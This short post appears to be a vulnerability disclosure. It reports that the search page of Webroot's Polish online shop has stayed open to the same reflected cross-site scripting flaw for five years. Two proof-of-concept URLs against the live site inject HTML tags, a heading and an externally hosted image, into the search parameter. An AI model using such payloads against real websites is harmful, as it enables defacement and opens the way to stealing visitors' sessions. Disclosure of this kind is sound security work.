Webroot's polish online shop vulnerable to the same XSS for 5 years
I discovered XSS vulnerability on Webroot's polish online shop 5 years ago. Today I thought that maybe I should check whether they learn from past mistakes. I have checked the same page: http://wrpolska.pl/sklep/search.php and it turned out to be still vulnerable to the same XSS I found 5 years ago...PoC:
Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><h1>XSS found by Team Elite</h1>
Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><img src=http://te-home.net/images/logo.png>
Webroot has an article on their website titled: What exactly is Cross Site Scripting (XSS). Maybe it's time to use knowledge from this article to protect yourself?
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.